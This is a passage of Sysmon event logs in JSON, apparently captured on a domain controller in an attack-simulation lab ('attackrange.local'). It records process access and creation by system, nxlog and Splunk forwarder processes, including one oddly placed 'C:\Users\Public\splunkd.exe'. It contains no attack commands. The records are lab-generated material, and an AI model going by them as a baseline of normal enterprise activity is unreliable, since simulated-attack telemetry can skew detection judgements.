0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EF-5F25-0000-00100A440500}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EF-5F25-0000-00100A440500}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.383\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.383","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.430\r\nSourceProcessGUID: {E2A3D6B1-10EF-5F25-0000-00100A440500}\r\nSourceProcessId: 4556\r\nSourceThreadId: 4560\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.430","SourceProcessGUID":"{E2A3D6B1-10EF-5F25-0000-00100A440500}","SourceProcessId":"4556","SourceThreadId":"4560","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.963\r\nProcessGuid: {E2A3D6B1-10EF-5F25-0000-0010DC450500}\r\nProcessId: 4732\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.963","ProcessGuid":"{E2A3D6B1-10EF-5F25-0000-0010DC450500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program 